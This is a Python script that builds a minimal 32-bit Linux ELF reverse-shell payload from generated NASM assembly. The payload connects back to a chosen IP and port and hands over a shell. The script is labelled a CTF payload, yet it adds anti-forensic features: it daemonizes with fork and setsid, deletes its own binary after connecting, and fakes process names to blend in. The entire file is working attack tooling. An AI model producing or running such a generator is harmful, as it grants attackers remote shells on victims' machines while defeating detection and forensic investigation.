#!/usr/bin/env python3
from __future__ import annotations

import argparse
import socket
import stat
import subprocess
import sys
from pathlib import Path


def little_endian_to_big_endian(hex_string: str) -> str:
    if not isinstance(hex_string, str) or not hex_string:
        raise ValueError("hex_string must contain hexadecimal digits")

    width = max(4, len(hex_string))
    if width % 2:
        width += 1
    padded_hex = hex_string.rjust(width, "0")
    try:
        return bytes.fromhex(padded_hex)[::-1].hex()
    except ValueError as exc:
        raise ValueError("hex_string contains non-hexadecimal characters") from exc


def ip_to_hex(ip: str) -> str:
    try:
        packed_ip = socket.inet_pton(socket.AF_INET, ip)
    except OSError as exc:
        raise ValueError(f"invalid IPv4 address: {ip!r}") from exc
    return little_endian_to_big_endian(packed_ip.hex())


def port_to_hex(port: int) -> str:
    """Encode a TCP port as the immediate used by ``push word``."""
    if isinstance(port, bool) or not isinstance(port, int) or not 1 <= port <= 65535:
        raise ValueError("port must be an integer from 1 to 65535")
    return little_endian_to_big_endian(f"{port:x}")


def _name_bytes(name: str) -> bytes:
    if not isinstance(name, str):
        raise TypeError("name must be a string")
    if not name:
        raise ValueError("name must not be empty")

    encoded = name.encode("utf-8")
    if b"\x00" in encoded:
        raise ValueError("name must not contain a NUL byte")
    return encoded


def name_to_hex(name: str) -> list[str]:

    encoded = _name_bytes(name)
    padding = (-len(encoded)) % 4
    padded = encoded + b"\x00" * padding
    return [padded[index : index + 4][::-1].hex() for index in range(0, len(padded), 4)]


def check_tool(tool_name: str) -> bool:
    try:
        subprocess.run(
            [tool_name, "--version"],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            check=True,
        )
    except (OSError, subprocess.CalledProcessError):
        return False
    return True


def check_dependencies() -> None:
    if not check_tool("nasm"):
        raise RuntimeError("NASM assembler is not installed; run dependencies.sh")


def _push_lines(value: str, indent: int = 4) -> str:
    """Return NASM ``push dword`` lines (first chunk on top) for a string."""
    pad = " " * indent
    return "\n".join(f"{pad}push dword 0x{hexv}" for hexv in reversed(name_to_hex(value)))


def build_assembly(
    ip: str,
    port: int,
    name: str,
    daemonize: bool = True,
    drop_path: str | None = None,
    shell: str = "/bin//sh",
) -> str:
    """Build the flat-binary NASM source for the payload.

    ``daemonize`` forks first: the parent exits and the child calls setsid, so
    the callback runs detached from the exploit's session (PPID 1, no
    controlling terminal) and reads as an ordinary background daemon.
    ``drop_path`` is the exact path the binary was deployed at; once the
    callback connects, the payload unlinks that file so nothing is left on
    disk for a forensic sweep. ``shell`` is the executable handed to execve;
    its basename becomes the process ``comm`` after the exec, so pick a shell
    whose name blends in with the target.
    """
    ip_hex = ip_to_hex(ip)
    port_hex = port_to_hex(port)
    name_pushes = _push_lines(name)
    shell_pushes = _push_lines(shell)

    blocks = [
        """; Generated by generate_elf.py
; Target: 32-bit Linux (int 0x80 socketcall ABI)

BITS 32
org 0x08048000

ehdr:                                                   ; Elf32_Ehdr
    db 0x7F, "ELF", 1, 1, 1, 0
    times 8 db 0
    dw 2                                               ; ET_EXEC
    dw 3                                               ; EM_386
    dd 1                                               ; EV_CURRENT
    dd _start                                          ; e_entry
    dd phdr - $$                                       ; e_phoff
    dd 0                                               ; e_shoff
    dd 0                                               ; e_flags
    dw ehdrsize                                        ; e_ehsize
    dw phdrsize                                        ; e_phentsize
    dw 1                                               ; e_phnum
    dw 0                                               ; e_shentsize
    dw 0                                               ; e_shnum
    dw 0                                               ; e_shstrndx

ehdrsize equ $ - ehdr

phdr:                                                   ; Elf32_Phdr
    dd 1                                               ; PT_LOAD
    dd 0                                               ; p_offset
    dd $$                                              ; p_vaddr
    dd $$                                              ; p_paddr
    dd filesize                                        ; p_filesz
    dd filesize                                        ; p_memsz
    dd 5                                               ; PF_R | PF_X
    dd 0x1000                                          ; p_align

phdrsize equ $ - phdr

_start:
""",
    ]

    if daemonize:
        blocks.append("""    ; daemonize: fork; the parent exits and the child calls setsid, so the
    ; callback runs as a background daemon (PPID 1, no controlling tty).
    xor eax, eax
    mov al, 2                                            ; SYS_FORK
    int 0x80
    test eax, eax
    jnz .parent_exit
    xor eax, eax
    mov al, 66                                           ; SYS_SETSID
    int 0x80
    jmp .daemonized
.parent_exit:
    xor eax, eax
    mov al, 1                                            ; SYS_EXIT
    xor ebx, ebx
    int 0x80
.daemonized:

""")

    blocks.append("""    ; socket(AF_INET, SOCK_STREAM, 0)
    xor eax, eax
    push eax
    push byte 1
    push byte 2
    mov ecx, esp
    xor ebx, ebx
    inc ebx                                             ; SYS_SOCKET
    mov al, 0x66                                        ; SYS_SOCKETCALL
    int 0x80
    test eax, eax
    js .fail
    mov esi, eax                                        ; save sockfd

""")

    blocks.append(f"""    ; connect(sockfd, {{sin_family, sin_port, sin_addr}}, 16)
    xor eax, eax
    push dword 0x{ip_hex}                                ; inet_addr({ip!r})
    push word 0x{port_hex}                               ; htons({port})
    push word 2                                          ; AF_INET
    mov ecx, esp
    push byte 16                                         ; sizeof(sockaddr_in)
    push ecx
    push esi
    xor ebx, ebx
    mov bl, 3                                            ; SYS_CONNECT
    mov ecx, esp
    mov al, 0x66                                         ; SYS_SOCKETCALL
    int 0x80
    test eax, eax
    js .fail

""")

    if drop_path:
        blocks.append(f"""    ; self-destruct: unlink our own binary now that the callback is live.
    ; The running image is already in memory and execve() targets
    ; {shell!r}, so deleting the file is safe. Best-effort: a wrong path is
    ; ignored and simply leaves the file in place.
    xor eax, eax
    push eax                                             ; drop-path terminator
{_push_lines(drop_path)}
    mov ebx, esp                                         ; path of our own binary
    mov eax, 10                                          ; SYS_UNLINK
    int 0x80

""")

    blocks.append("""    ; dup2(sockfd, stdin/stdout/stderr)
    mov ebx, esi
    xor ecx, ecx
    xor eax, eax
    mov al, 0x3f                                         ; SYS_DUP2
    int 0x80
    inc ecx
    xor eax, eax
    mov al, 0x3f
    int 0x80
    inc ecx
    xor eax, eax
    mov al, 0x3f
    int 0x80

""")

    blocks.append(f"""    ; execve({shell!r}, [name, NULL], NULL)
    xor eax, eax
    push eax                                             ; shell-path terminator
{shell_pushes}
    mov ebx, esp                                         ; shell path
    push eax                                             ; name terminator
{name_pushes}
    mov esi, esp                                         ; argv[0]
    push eax                                             ; argv terminator
    push esi
    mov ecx, esp                                         ; argv
    xor edx, edx                                         ; envp = NULL
    mov al, 0xb                                          ; SYS_EXECVE
    int 0x80

""")

    blocks.append("""    ; unreachable unless execve fails: exit quietly so a failed callback
    ; does not linger as a broken shell process
.fail:
    xor eax, eax
    mov al, 1                                            ; SYS_EXIT
    xor ebx, ebx
    int 0x80

filesize equ $ - $$
""")

    return "".join(blocks)


def _set_executable(path: Path) -> None:
    mode = path.stat().st_mode
    path.chmod(mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)


def generate_elf(
    ip: str,
    port: int,
    name: str,
    output: str | Path = "vuln",
    asm_output: str | Path = "vuln.asm",
    daemonize: bool = True,
    drop_path: str | None = None,
    shell: str = "/bin//sh",
) -> tuple[Path, int]:
    """Assemble the payload and return its output path and size in bytes."""
    assembly = build_assembly(
        ip, port, name, daemonize=daemonize, drop_path=drop_path, shell=shell
    )
    output_path = Path(output)
    asm_path = Path(asm_output)
    if output_path.resolve() == asm_path.resolve():
        raise ValueError("output and assembly paths must be different")

    check_dependencies()
    output_path.parent.mkdir(parents=True, exist_ok=True)
    asm_path.parent.mkdir(parents=True, exist_ok=True)
    with asm_path.open("w", encoding="ascii", newline="\n") as source:
        source.write(assembly)

    try:
        subprocess.run(
            ["nasm", "-f", "bin", "-o", str(output_path), str(asm_path)],
            check=True,
        )
    except (OSError, subprocess.CalledProcessError) as exc:
        raise RuntimeError(f"NASM failed while assembling {asm_path}") from exc

    _set_executable(output_path)
    data = output_path.read_bytes()
    if data[:4] != b"\x7fELF" or len(data) < 52:
        raise RuntimeError("NASM produced an invalid ELF output")
    return output_path, len(data)


def _port_argument(value: str) -> int:
    try:
        port = int(value, 10)
    except ValueError as exc:
        raise argparse.ArgumentTypeError("port must be a decimal integer") from exc
    if not 1 <= port <= 65535:
        raise argparse.ArgumentTypeError("port must be from 1 to 65535")
    return port


def main(argv: list[str] | None = None) -> int:
    parser = argparse.ArgumentParser(description="Generate a minimal 32-bit Linux CTF payload")
    parser.add_argument("ip", help="IPv4 callback address")
    parser.add_argument("port", type=_port_argument, help="TCP callback port")
    parser.add_argument("name", help="custom argv[0] shown by process listings")
    parser.add_argument("-o", "--output", default="vuln", help="ELF output path (default: vuln)")
    parser.add_argument(
        "--asm-output",
        default="vuln.asm",
        help="generated NASM source path (default: vuln.asm)",
    )
    parser.add_argument(
        "--no-daemonize",
        action="store_true",
        help="run attached to the caller's session (default: fork + setsid)",
    )
    parser.add_argument(
        "--drop-path",
        metavar="PATH",
        default=None,
        help="exact path the binary is deployed at; unlink it after the callback connects",
    )
    parser.add_argument(
        "--shell",
        metavar="PATH",
        default="/bin//sh",
        help="shell executable for execve (default: /bin//sh)",
    )
    args = parser.parse_args(argv)

    try:
        output, size = generate_elf(
            args.ip,
            args.port,
            args.name,
            output=args.output,
            asm_output=args.asm_output,
            daemonize=not args.no_daemonize,
            drop_path=args.drop_path,
            shell=args.shell,
        )
    except (OSError, TypeError, ValueError, RuntimeError) as exc:
        parser.error(str(exc))

    print(f"ELF file {output!s} generated successfully ({size} bytes).")
    if size >= 200:
        print(
            "Warning: payload is 200 bytes or larger; keep names and paths short "
            "to stay minimal.",
            file=sys.stderr,
        )
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
